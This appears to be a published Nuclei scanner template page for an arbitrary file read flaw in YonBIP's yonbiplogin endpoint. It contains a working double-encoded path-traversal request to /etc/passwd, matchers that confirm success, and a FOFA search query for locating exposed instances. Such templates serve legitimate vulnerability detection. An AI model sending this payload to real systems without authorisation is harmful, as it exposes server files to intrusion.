Skip to content

YonBIP - Arbitrary File Read

ID: yonyou-yonbip-lfi

Severity: high

Author: l1b3r

Tags: yonyou,yonbip,lfi

There is an arbitrary file reading vulnerability in yonbiplogin, the advanced version of YonBIP

id: yonyou-yonbip-lfi
info:
name: YonBIP - Arbitrary File Read
author: l1b3r
severity: high
description: |
There is an arbitrary file reading vulnerability in yonbiplogin, the advanced version of YonBIP
reference:
- https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BYonBIP%E9%AB%98%E7%BA%A7%E7%89%88yonbiplogin%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: title="YonBIP" || title="数字化工作台"
tags: yonyou,yonbip,lfi
http:
- method: GET
path:
- "{{BaseURL}}/iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js"
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(content_type, "application/javascript")'
- "status_code == 200"
condition: and
# digest: 4a0a0047304502205cb707e0ee1997a014d1781f7250c39ebf38122336b74101a5cd1e5220314733022100ce00d1d65c1be5173814800073fe30e9c840e1639b6f1b47e907a9adfc69d9ce:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/yonyou-yonbip-lfi.yaml"

View on Github